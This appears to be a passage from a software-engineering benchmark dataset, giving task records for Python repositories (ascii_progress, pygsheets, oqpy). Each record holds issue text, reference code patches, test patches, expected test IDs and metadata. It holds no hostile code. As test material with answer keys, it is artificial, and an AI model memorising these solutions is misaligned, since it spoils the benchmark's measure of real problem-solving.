"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Segment-activity_type-FooBar-Workout]"
] |
[
"src/stravalib/tests/unit/test_model.py::TestLegacyModelSerialization::test_legacy_deserialize[Club-name-foo]",
"src/stravalib/tests/unit/test_model.py::TestLegacyModelSerialization::test_legacy_from_dict[Club-name-foo]",
"src/stravalib/tests/unit/test_model.py::TestLegacyModelSerialization::test_legacy_to_dict[Club-name-foo]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Club-raw0-foo]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[ActivityTotals-raw1-expected_value1]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[ActivityTotals-raw2-expected_value2]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Activity-raw3-expected_value3]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Club-raw4-expected_value4]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Activity-raw5-Run]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw0-expected_value0]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw1-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Segment-raw2-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[SegmentExplorerResult-raw3-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[ActivityPhoto-raw4-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw5-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw6-expected_value6]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[BaseEffort-raw7-expected_value7]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[ActivityLap-raw8-expected_value8]",
"src/stravalib/tests/unit/test_model.py::test_subscription_callback_field_names",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[None-None-False0]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[None-None-False1]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[1-1-False0]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression3-expected_result3-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression4-expected_result4-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression5-expected_result5-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[1-1-False1]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression7-expected_result7-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression8-expected_result8-True]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression9-expected_result9-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression10-expected_result10-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression11-expected_result11-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression12-expected_result12-True]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression13-expected_result13-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression14-expected_result14-True]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression15-expected_result15-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression16-expected_result16-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression17-expected_result17-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression18-expected_result18-True]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-type-Run-Run]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-sport_type-Run-Run]",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_distance_units",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_entity_collections",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_speed_units",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_subscription_deser",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_subscription_update_deser",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_time_intervals",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_weight_units"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-01-16 17:00:24+00:00
|
apache-2.0
| 5,749
|
|
Deric-W__ascii_progress-9
|
diff --git a/ascii_progress/__main__.py b/ascii_progress/__main__.py
index f5d1e15..b550f91 100644
--- a/ascii_progress/__main__.py
+++ b/ascii_progress/__main__.py
@@ -16,7 +16,7 @@ for frames in (
(">))'>", " >))'>", " >))'>", " <'((<", " <'((<", "<'((<")
):
sys.stdout.write("Working ")
- with Spinner(frames) as spinner:
+ with Spinner(frames).handle_exceptions("Done", "Exception") as spinner:
for _ in map(spinner.set_progress, range(1, 15)):
time.sleep(0.2)
@@ -29,6 +29,6 @@ for bar_format in map(
)
):
sys.stdout.write("Working ")
- with bar_format.bar(75) as bar:
+ with bar_format.bar(75).handle_exceptions("Done", "Exception") as bar:
for _ in bar:
time.sleep(0.02)
diff --git a/ascii_progress/bar.py b/ascii_progress/bar.py
index e660116..b5f0903 100644
--- a/ascii_progress/bar.py
+++ b/ascii_progress/bar.py
@@ -9,11 +9,23 @@ import sys
import math
from abc import abstractmethod
from string import Formatter
-from typing import Callable, Sequence, TextIO, Tuple, Iterator, ContextManager, Mapping, Any, Union
+from typing import (
+ Callable,
+ Sequence,
+ TextIO,
+ Tuple,
+ Iterator,
+ ContextManager,
+ Mapping,
+ Any,
+ Union,
+ TypeVar
+)
__all__ = (
"LazyFormatter",
"LAZY_FORMATTER",
+ "BarContext",
"Bar",
"ThresholdDecorator",
"PercentDecorator",
@@ -36,8 +48,48 @@ class LazyFormatter(Formatter):
LAZY_FORMATTER = LazyFormatter()
+T = TypeVar("T", bound="Bar")
+
+
+class BarContext(ContextManager[T]):
+ """context manager which handles exceptions while using a bar"""
+
+ bar: T
+
+ message: str
+
+ error: str
+
+ __slots__ = ("bar", "message", "error")
+
+ def __init__(self, bar: T, message: str, error: str) -> None:
+ self.bar = bar
+ self.message = message
+ self.error = error
+
+ def __eq__(self, other: object) -> bool:
+ if isinstance(other, BarContext):
+ return self.bar == other.bar \
+ and self.message == other.message \
+ and self.error == other.error
+ return NotImplemented
+
+ def __enter__(self) -> T:
+ return self.bar
+
+ def __exit__(self, type, value, traceback) -> bool: # type: ignore
+ if type is None:
+ self.bar.replace(self.message, end="\n")
+ elif type is KeyboardInterrupt:
+ # add 2 \b and 2 spaces to handle additional ^C
+ # add 2 additional spaces to make up for missing padding
+ self.bar.replace("\b\b" + self.error, end=" \n")
+ else:
+ self.bar.replace(self.error, end="\n")
+ return False # we dont handle exceptions
+
-class Bar(ContextManager["Bar"], Iterator[None]):
+class Bar(Iterator[None]):
"""abstract base class for progress bars"""
__slots__ = ()
@@ -49,16 +101,6 @@ class Bar(ContextManager["Bar"], Iterator[None]):
and self.width() == other.width()
return NotImplemented
- def __enter__(self) -> "Bar":
- return self
-
- def __exit__(self, type, value, traceback) -> bool: # type: ignore
- if type is KeyboardInterrupt: # handle ^C
- self.replace("\b\bKeyboardInterrupt", end=" \n")
- else:
- self.replace("Finished")
- return False # we dont handle exceptions
-
def __iter__(self) -> "Bar":
return self
@@ -97,6 +139,10 @@ class Bar(ContextManager["Bar"], Iterator[None]):
"""return the size of the bar"""
raise NotImplementedError
+ def handle_exceptions(self: T, message: str, error: str) -> BarContext[T]:
+ """return a context manager which replaces the bar with message or error if a exceptions is raised"""
+ return BarContext(self, message, error)
+
def ratio(self) -> float:
"""return the ration progress / target"""
return self.progress() / self.target()
@@ -271,16 +317,14 @@ class PercentDecorator(ThresholdDecorator):
@classmethod
def with_inferred_thresholds(cls, bar: Bar) -> "PercentDecorator":
"""create an instance with inferred thresholds"""
- lower_threshold, upper_threshold = calculate_thresholds(bar, 100)
- return cls(
- bar,
- lower_threshold,
- upper_threshold,
- )
+ return cls(bar, *calculate_thresholds(bar, 100))
def update_thresholds(self) -> None:
"""update lower and upper thresholds"""
- self.lower_threshold, self.upper_threshold = calculate_thresholds(self.bar, 100)
+ self.lower_threshold, self.upper_threshold = calculate_thresholds(
+ self.bar,
+ 100
+ )
class BarDecorator(ThresholdDecorator):
@@ -291,16 +335,14 @@ class BarDecorator(ThresholdDecorator):
@classmethod
def with_inferred_thresholds(cls, bar: Bar) -> "BarDecorator":
"""create an instance with inferred thresholds"""
- lower_threshold, upper_threshold = calculate_thresholds(bar, bar.width())
- return cls(
- bar,
- lower_threshold,
- upper_threshold,
- )
+ return cls(bar, *calculate_thresholds(bar, bar.width()))
def update_thresholds(self) -> None:
"""update lower and upper thresholds"""
- self.lower_threshold, self.upper_threshold = calculate_thresholds(self.bar, self.bar.width())
+ self.lower_threshold, self.upper_threshold = calculate_thresholds(
+ self.bar,
+ self.bar.width()
+ )
class BarFormat:
diff --git a/ascii_progress/spinner.py b/ascii_progress/spinner.py
index 17edecd..c3fc287 100644
--- a/ascii_progress/spinner.py
+++ b/ascii_progress/spinner.py
@@ -6,14 +6,55 @@
# SPDX-License-Identifier: MIT
import sys
-from typing import ContextManager, Iterator, TextIO, Sequence
+from typing import ContextManager, Iterator, TextIO, Sequence, TypeVar
__all__ = (
- "Spinner",
+ "SpinnerContext",
+ "Spinner"
)
+T = TypeVar("T", bound="Spinner")
-class Spinner(ContextManager, Iterator[None]):
+
+class SpinnerContext(ContextManager[T]):
+ """context manager which handles exceptions while using the spinner"""
+
+ spinner: T
+
+ message: str
+
+ error: str
+
+ __slots__ = ("spinner", "message", "error")
+
+ def __init__(self, spinner: T, message: str, error: str) -> None:
+ self.spinner = spinner
+ self.message = message
+ self.error = error
+
+ def __eq__(self, other: object) -> bool:
+ if isinstance(other, SpinnerContext):
+ return self.spinner == other.spinner \
+ and self.message == other.message \
+ and self.error == other.error
+ return NotImplemented
+
+ def __enter__(self) -> T:
+ return self.spinner
+
+ def __exit__(self, type, value, traceback) -> bool: # type: ignore
+ if type is None:
+ self.spinner.replace(self.message, end="\n")
+ elif type is KeyboardInterrupt:
+ # add 2 \b and 2 spaces to handle additional ^C
+ # add 2 additional spaces to make up for missing padding
+ self.spinner.replace("\b\b" + self.error, end=" \n")
+ else:
+ self.spinner.replace(self.error, end="\n")
+ return False # we dont handle exceptions
+
+
+class Spinner(Iterator[None]):
"""class for creating a spinning animation"""
frames: Sequence[str]
@@ -43,16 +84,6 @@ class Spinner(ContextManager, Iterator[None]):
and self.file is other.file
return NotImplemented
- def __enter__(self) -> "Spinner":
- return self
-
- def __exit__(self, type, value, traceback) -> bool: # type: ignore
- if type is KeyboardInterrupt: # add 2 \b and 2 spaces to handle additional ^C
- self.replace("\b\bKeyboardInterrupt", end=" \n")
- else:
- self.replace("Finished")
- return False # we dont handle exceptions
-
def __iter__(self) -> "Spinner":
return self
@@ -102,3 +133,7 @@ class Spinner(ContextManager, Iterator[None]):
# pad message to fully overwrite old frame and add end
self.file.write(message + " " * (len(self.current_frame) - len(message)) + end)
self.file.flush()
+
+ def handle_exceptions(self: T, message: str, error: str) -> SpinnerContext[T]:
+ """return a context manager which replaces the spinner with message or error if a exceptions is raised"""
+ return SpinnerContext(self, message, error)
|
Deric-W/ascii_progress
|
a5f5f2815ba25cdfdcf57a0f02c025ef9dc2a3b0
|
diff --git a/tests/test_bar.py b/tests/test_bar.py
index bfab94b..bc53278 100644
--- a/tests/test_bar.py
+++ b/tests/test_bar.py
@@ -5,8 +5,10 @@
import unittest
import unittest.mock
from io import StringIO
+from typing import ContextManager
from ascii_progress.bar import (
LAZY_FORMATTER,
+ BarContext,
Bar,
ASCIIBar,
ThresholdDecorator,
@@ -42,6 +44,58 @@ class TestLazyFormatter(unittest.TestCase):
)
+class BarSpinnerContext(unittest.TestCase):
+ """tests for BarContext"""
+
+ def test_eq(self) -> None:
+ """test BarContext.__eq__"""
+ format = BarFormat(("-[", "]-"), (" ", "=="), 5)
+ bar = ASCIIBar(format, file=StringIO())
+ contexts = [
+ BarContext(bar, "1", "2"),
+ BarContext(bar, "2", "2"),
+ BarContext(bar, "1", "1"),
+ BarContext(ASCIIBar(format, file=StringIO()), "1", "1")
+ ]
+ for context in contexts:
+ self.assertEqual(
+ [context],
+ [c for c in contexts if c == context]
+ )
+ self.assertNotEqual(contexts[0], 42)
+
+ def test_context(self) -> None:
+ """test SpinnerContext as context manager"""
+ output = StringIO()
+ bar = ASCIIBar(BarFormat(("[", "]"), (" ", "="), 3, format="{bar}"), file=output)
+ with BarContext(bar, "1", "2") as context:
+ self.assertIsInstance(context, Bar)
+ context.set_progress(34)
+ context.update()
+ with self.assertRaises(RuntimeError):
+ with BarContext(bar, "1", "2") as context:
+ context.set_progress(67)
+ context.update()
+ raise RuntimeError
+ with self.assertRaises(KeyboardInterrupt):
+ with BarContext(bar, "1", "2") as context:
+ context.set_progress(100)
+ context.update()
+ raise KeyboardInterrupt
+ self.assertEqual(
+ output.getvalue(),
+ "\b\b\b\b\b".join((
+ "[ ]",
+ "[= ]",
+ "1 \n",
+ "[== ]",
+ "2 \n",
+ "[===]",
+ "\b\b2 \n"
+ ))
+ )
+
+
class TestBar(unittest.TestCase):
"""Tests for Bar"""
@@ -76,18 +130,11 @@ class TestBar(unittest.TestCase):
break
self.assertEqual(next(iterations), 11)
- def test_enter(self) -> None:
- """test Bar.__enter__ and __exit__"""
- mock = unittest.mock.Mock(spec=Bar)
- self.assertIs(Bar.__enter__(mock), mock)
- self.assertFalse(Bar.__exit__(mock, None, None, None))
- self.assertFalse(Bar.__exit__(mock, KeyboardInterrupt, KeyboardInterrupt(), None))
- self.assertEqual(
- mock.replace.call_args_list,
- [
- unittest.mock.call("Finished"),
- unittest.mock.call("\b\bKeyboardInterrupt", end=" \n")
- ]
+ def test_handle_exceptions(self) -> None:
+ """test Bar.handle_exceptions"""
+ self.assertIsInstance(
+ Bar.handle_exceptions(None, "", ""),
+ ContextManager
)
diff --git a/tests/test_spinner.py b/tests/test_spinner.py
index 037d43c..0cffa5b 100644
--- a/tests/test_spinner.py
+++ b/tests/test_spinner.py
@@ -5,7 +5,48 @@
import unittest
import unittest.mock
from io import StringIO
-from ascii_progress.spinner import Spinner
+from typing import ContextManager
+from ascii_progress.spinner import Spinner, SpinnerContext
+
+
+class TestSpinnerContext(unittest.TestCase):
+ """tests for SpinnerContext"""
+
+ def test_eq(self) -> None:
+ """test SpinnerContext.__eq__"""
+ spinner = Spinner("abc", StringIO())
+ contexts = [
+ SpinnerContext(spinner, "1", "2"),
+ SpinnerContext(spinner, "2", "2"),
+ SpinnerContext(spinner, "1", "1"),
+ SpinnerContext(Spinner("abc", StringIO()), "1", "2")
+ ]
+ for context in contexts:
+ self.assertEqual(
+ [context],
+ [c for c in contexts if c == context]
+ )
+ self.assertNotEqual(contexts[0], 42)
+
+ def test_context(self) -> None:
+ """test SpinnerContext as context manager"""
+ output = StringIO()
+ spinner = Spinner("abc", output)
+ with SpinnerContext(spinner, "1", "2") as context:
+ self.assertIsInstance(context, Spinner)
+ context.current_frame = "b"
+ with self.assertRaises(RuntimeError):
+ with SpinnerContext(spinner, "1", "2") as context:
+ context.current_frame = "c"
+ raise RuntimeError
+ with self.assertRaises(KeyboardInterrupt):
+ with SpinnerContext(spinner, "1", "2") as context:
+ context.current_frame = "a"
+ raise KeyboardInterrupt
+ self.assertEqual(
+ output.getvalue(),
+ "a\bb\b1\n\bc\b2\n\ba\b\b\b2 \n"
+ )
class TestSpinner(unittest.TestCase):
@@ -31,27 +72,13 @@ class TestSpinner(unittest.TestCase):
)
self.assertNotEqual(spinners[0], 42)
- def test_context(self) -> None:
- """test Spinner __enter__ and __exit__"""
- output = StringIO()
- with Spinner("abc", output) as spinner:
- self.assertIsInstance(spinner, Spinner)
- self.assertEqual(output.getvalue(), "a")
- self.assertEqual(output.getvalue(), "a\bFinished\n")
- output.seek(0)
- output.truncate(0)
- with self.assertRaises(KeyboardInterrupt):
- with Spinner("abc", output) as spinner:
- raise KeyboardInterrupt
- self.assertEqual(output.getvalue(), "a\b\b\bKeyboardInterrupt \n")
-
def test_iter(self) -> None:
"""test Spinner __iter__ and __exit__"""
output = StringIO()
- with Spinner("abc", output) as spinner:
- for _ in zip(range(6), spinner):
- pass
- self.assertEqual(output.getvalue(), "a\bb\bc\ba\bb\bc\ba\bFinished\n")
+ spinner = Spinner("abc", output)
+ for _ in zip(range(6), spinner):
+ pass
+ self.assertEqual(output.getvalue(), "a\bb\bc\ba\bb\bc\ba")
def test_with_padding(self) -> None:
"""test Spinner.with_padding"""
@@ -63,14 +90,14 @@ class TestSpinner(unittest.TestCase):
def test_current_frame(self) -> None:
"""test Spinner.current_frame"""
output = StringIO()
- with Spinner("abc", output) as spinner:
- self.assertEqual(spinner.current_frame, "a")
- spinner.set_progress(1)
- self.assertEqual(spinner.current_frame, "b")
- spinner.current_frame = "a"
- with self.assertRaises(ValueError):
- spinner.current_frame = "x"
- self.assertEqual(output.getvalue(), "a\bb\ba\bFinished\n")
+ spinner = Spinner("abc", output)
+ self.assertEqual(spinner.current_frame, "a")
+ spinner.set_progress(1)
+ self.assertEqual(spinner.current_frame, "b")
+ spinner.current_frame = "a"
+ with self.assertRaises(ValueError):
+ spinner.current_frame = "x"
+ self.assertEqual(output.getvalue(), "a\bb\ba")
def test_update(self) -> None:
"""test Spinner.update"""
@@ -96,11 +123,13 @@ class TestSpinner(unittest.TestCase):
def test_set_progress(self) -> None:
"""test Spinner.set_progress"""
- output = StringIO()
- with Spinner("abc", output) as spinner:
- spinner.set_progress(2)
- spinner.set_progress(4)
- self.assertEqual(output.getvalue(), "a\bc\bb\bFinished\n")
+ output = unittest.mock.Mock(wraps=StringIO())
+ spinner = Spinner("abc", output)
+ output.reset_mock()
+ spinner.set_progress(2)
+ output.flush.assert_called()
+ spinner.set_progress(4)
+ self.assertEqual(output.getvalue(), "a\bc\bb")
def test_replace(self) -> None:
"""test Spinner.replace"""
@@ -110,3 +139,10 @@ class TestSpinner(unittest.TestCase):
Spinner(("testtest", ""), output).replace("test", "42")
self.assertEqual(output.flush.call_count, 2)
self.assertEqual(output.getvalue(), "testtest\b\b\b\b\b\b\b\btest 42")
+
+ def test_handle_exceptions(self) -> None:
+ """test Spinner.handle_exceptions"""
+ self.assertIsInstance(
+ Spinner("abc", file=StringIO()).handle_exceptions("", ""),
+ ContextManager
+ )
|
improved context managers
Problem:
The messages displayed when using `Spinner` or `Bar` as context managers are hard-coded.
Solution:
Add a `.handle_exceptions(message, error)` method to both classes that returns a context manager with configurable completion and error messages.
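A condensed sketch of what such a context manager could look like (simplified; the real classes also special-case `KeyboardInterrupt` to clean up the extra `^C` characters):
```python
class SpinnerContext:
    """Wraps a spinner (or bar) with configurable completion/error messages."""

    def __init__(self, spinner, message, error):
        self.spinner = spinner
        self.message = message  # shown when the block exits normally
        self.error = error      # shown when an exception escapes the block

    def __enter__(self):
        return self.spinner

    def __exit__(self, exc_type, exc_value, traceback):
        if exc_type is None:
            self.spinner.replace(self.message, end="\n")
        else:
            self.spinner.replace(self.error, end="\n")
        return False  # exceptions are not swallowed
```
Usage would then look like `with Spinner(frames).handle_exceptions("Done", "Exception") as spinner: ...` instead of relying on the baked-in "Finished" message.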
|
0.0
|
a5f5f2815ba25cdfdcf57a0f02c025ef9dc2a3b0
|
[
"tests/test_bar.py::TestBar::test_iter",
"tests/test_bar.py::TestBar::test_handle_exceptions",
"tests/test_bar.py::TestBar::test_eq",
"tests/test_bar.py::TestBarFormat::test_generate_bar",
"tests/test_bar.py::TestBarFormat::test_bar",
"tests/test_bar.py::TestBarFormat::test_with_optimized_wrapper",
"tests/test_bar.py::TestBarFormat::test_eq",
"tests/test_bar.py::TestBarFormat::test_init",
"tests/test_bar.py::TestASCIIBar::test_format_progress",
"tests/test_bar.py::TestASCIIBar::test_target",
"tests/test_bar.py::TestASCIIBar::test_width",
"tests/test_bar.py::TestASCIIBar::test_format_bar",
"tests/test_bar.py::TestASCIIBar::test_format_percent",
"tests/test_bar.py::TestASCIIBar::test_eq",
"tests/test_bar.py::TestASCIIBar::test_update",
"tests/test_bar.py::TestASCIIBar::test_replace",
"tests/test_bar.py::TestASCIIBar::test_progress",
"tests/test_bar.py::TestPercentDecorator::test_update_thresholds",
"tests/test_bar.py::TestPercentDecorator::test_with_inferred_thresholds",
"tests/test_bar.py::TestBarDecorator::test_update_thresholds",
"tests/test_bar.py::TestBarDecorator::test_with_inferred_thresholds",
"tests/test_bar.py::TestThresholdDecorator::test_eq",
"tests/test_bar.py::TestThresholdDecorator::test_width",
"tests/test_bar.py::TestThresholdDecorator::test_target",
"tests/test_bar.py::TestThresholdDecorator::test_replace",
"tests/test_bar.py::TestThresholdDecorator::test_progress",
"tests/test_bar.py::TestThresholdDecorator::test_update",
"tests/test_bar.py::BarSpinnerContext::test_eq",
"tests/test_bar.py::BarSpinnerContext::test_context",
"tests/test_bar.py::TestLazyFormatter::test_format",
"tests/test_bar.py::TestLazyFormatter::test_get_value",
"tests/test_spinner.py::TestSpinnerContext::test_context",
"tests/test_spinner.py::TestSpinnerContext::test_eq",
"tests/test_spinner.py::TestSpinner::test_handle_exceptions",
"tests/test_spinner.py::TestSpinner::test_replace",
"tests/test_spinner.py::TestSpinner::test_reset",
"tests/test_spinner.py::TestSpinner::test_with_padding",
"tests/test_spinner.py::TestSpinner::test_iter",
"tests/test_spinner.py::TestSpinner::test_update",
"tests/test_spinner.py::TestSpinner::test_current_frame",
"tests/test_spinner.py::TestSpinner::test_eq",
"tests/test_spinner.py::TestSpinner::test_set_progress"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-10-30 12:16:54+00:00
|
mit
| 197
|
|
nithinmurali__pygsheets-272
|
diff --git a/.gitignore b/.gitignore
index 9bc512f..3556492 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,22 +1,28 @@
+# Python
*.pyc
-.DS_Store
-.coverage
-
+build/
+dist/
venv/
-.idea/
.cache/
.pytest_cache/
-build/
-dist/
-# docs/
+pygsheets.egg-info/
+.pytest_cache/
+
+# File types
*.json
*.csv
+
+# Tests
test/*.json
test/usages
test/data/*.json
test/manual_test1.py
-pygsheets.egg-info/
+# Other
+.idea/
+.DS_Store
+.python-version
+.coverage
diff --git a/pygsheets/authorization.py b/pygsheets/authorization.py
index 6c1b37f..0d4420b 100644
--- a/pygsheets/authorization.py
+++ b/pygsheets/authorization.py
@@ -59,7 +59,6 @@ _SCOPES = ('https://www.googleapis.com/auth/spreadsheets', 'https://www.googleap
_deprecated_keyword_mapping = {
'outh_file': 'client_secret',
'outh_creds_store': 'credentials_directory',
- 'outh_nonlocal': 'non_local_authorization',
'service_file': 'service_account_file',
'credentials': 'custom_credentials'
}
@@ -86,13 +85,15 @@ def authorize(client_secret='client_secret.json',
:param kwargs: Parameters to be handed into the client constructor.
:returns: :class:`Client`
"""
- v = vars()
+
for key in kwargs:
if key in ['outh_file', 'outh_creds_store', 'service_file', 'credentials']:
warnings.warn('The argument {} is deprecated. Use {} instead.'.format(key, _deprecated_keyword_mapping[key])
, category=DeprecationWarning)
- v[_deprecated_keyword_mapping[key]] = kwargs[key]
- del kwargs[key]
+ client_secret = kwargs.get('outh_file', client_secret)
+ service_account_file = kwargs.get('service_file', service_account_file)
+ credentials_directory = kwargs.get('outh_creds_store', credentials_directory)
+ custom_credentials = kwargs.get('credentials', custom_credentials)
if custom_credentials is not None:
credentials = custom_credentials
|
nithinmurali/pygsheets
|
136c295143f6365bdbca70328a876b1cc66baab3
|
diff --git a/test/authorization_tests.py b/test/authorization_tests.py
index eee5b06..16389cb 100644
--- a/test/authorization_tests.py
+++ b/test/authorization_tests.py
@@ -26,4 +26,8 @@ class TestAuthorization(object):
self.sheet = c.create('test_sheet')
self.sheet.share('pygsheettest@gmail.com')
- self.sheet.delete()
\ No newline at end of file
+ self.sheet.delete()
+
+ def test_deprecated_kwargs_removal(self):
+ c = pygsheets.authorize(service_file=self.base_path + '/pygsheettest_service_account.json')
+ assert isinstance(c, Client)
\ No newline at end of file
|
RuntimeError: dictionary changed size during iteration
https://github.com/nithinmurali/pygsheets/blob/0e2468fe9a1957b19f1cebe3667c601c32942bbd/pygsheets/authorization.py#L94
You can't delete keys from a dictionary while you are iterating over it.
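A minimal reproduction and the usual fix (illustrative only, using a toy `kwargs` dict):
```python
# Broken: mutating the dict while iterating it raises
# "RuntimeError: dictionary changed size during iteration" on Python 3.
kwargs = {"outh_file": "secret.json", "other": 1}
try:
    for key in kwargs:
        if key == "outh_file":
            del kwargs[key]
except RuntimeError as exc:
    print(exc)  # dictionary changed size during iteration

# Safe: iterate over a snapshot of the keys instead.
kwargs = {"outh_file": "secret.json", "other": 1}
for key in list(kwargs):
    if key == "outh_file":
        del kwargs[key]
print(kwargs)  # {'other': 1}
```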
|
0.0
|
136c295143f6365bdbca70328a876b1cc66baab3
|
[
"test/authorization_tests.py::TestAuthorization::test_deprecated_kwargs_removal"
] |
[
"test/authorization_tests.py::TestAuthorization::test_service_account_authorization",
"test/authorization_tests.py::TestAuthorization::test_user_credentials_loading"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-08-23 06:30:01+00:00
|
mit
| 4,222
|
|
openqasm__oqpy-20
|
diff --git a/oqpy/base.py b/oqpy/base.py
index 4a45796..43dece9 100644
--- a/oqpy/base.py
+++ b/oqpy/base.py
@@ -60,12 +60,29 @@ class OQPyExpression:
"""Helper method to produce a binary expression."""
return OQPyBinaryExpression(ast.BinaryOperator[op_name], first, second)
+ @staticmethod
+ def _to_unary(op_name: str, exp: AstConvertible) -> OQPyUnaryExpression:
+ """Helper method to produce a binary expression."""
+ return OQPyUnaryExpression(ast.UnaryOperator[op_name], exp)
+
+ def __pos__(self) -> OQPyExpression:
+ return self
+
+ def __neg__(self) -> OQPyUnaryExpression:
+ return self._to_unary("-", self)
+
def __add__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("+", self, other)
def __radd__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("+", other, self)
+ def __sub__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("-", self, other)
+
+ def __rsub__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("-", other, self)
+
def __mod__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("%", self, other)
@@ -78,6 +95,18 @@ class OQPyExpression:
def __rmul__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("*", other, self)
+ def __truediv__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("/", self, other)
+
+ def __rtruediv__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("/", other, self)
+
+ def __pow__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("**", self, other)
+
+ def __rpow__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("**", other, self)
+
def __eq__(self, other: AstConvertible) -> OQPyBinaryExpression: # type: ignore[override]
return self._to_binary("==", self, other)
@@ -132,6 +161,23 @@ class ExpressionConvertible(Protocol):
...
+class OQPyUnaryExpression(OQPyExpression):
+ """An expression consisting of one expression preceded by an operator."""
+
+ def __init__(self, op: ast.UnaryOperator, exp: AstConvertible):
+ super().__init__()
+ self.op = op
+ self.exp = exp
+ if isinstance(exp, OQPyExpression):
+ self.type = exp.type
+ else:
+ raise TypeError("exp is an expression")
+
+ def to_ast(self, program: Program) -> ast.UnaryExpression:
+ """Converts the OQpy expression into an ast node."""
+ return ast.UnaryExpression(self.op, to_ast(program, self.exp))
+
+
class OQPyBinaryExpression(OQPyExpression):
"""An expression consisting of two subexpressions joined by an operator."""
diff --git a/oqpy/classical_types.py b/oqpy/classical_types.py
index 630e336..7bc216f 100644
--- a/oqpy/classical_types.py
+++ b/oqpy/classical_types.py
@@ -38,6 +38,7 @@ if TYPE_CHECKING:
from oqpy.program import Program
__all__ = [
+ "pi",
"BoolVar",
"IntVar",
"UintVar",
@@ -53,6 +54,7 @@ __all__ = [
"stretch",
"bool_",
"bit_",
+ "bit",
"bit8",
"convert_range",
"int_",
@@ -78,24 +80,24 @@ __all__ = [
# subclasses of ``_ClassicalVar`` instead.
-def int_(size: int) -> ast.IntType:
+def int_(size: int | None = None) -> ast.IntType:
"""Create a sized signed integer type."""
- return ast.IntType(ast.IntegerLiteral(size))
+ return ast.IntType(ast.IntegerLiteral(size) if size is not None else None)
-def uint_(size: int) -> ast.UintType:
+def uint_(size: int | None = None) -> ast.UintType:
"""Create a sized unsigned integer type."""
- return ast.UintType(ast.IntegerLiteral(size))
+ return ast.UintType(ast.IntegerLiteral(size) if size is not None else None)
-def float_(size: int) -> ast.FloatType:
+def float_(size: int | None = None) -> ast.FloatType:
"""Create a sized floating-point type."""
- return ast.FloatType(ast.IntegerLiteral(size))
+ return ast.FloatType(ast.IntegerLiteral(size) if size is not None else None)
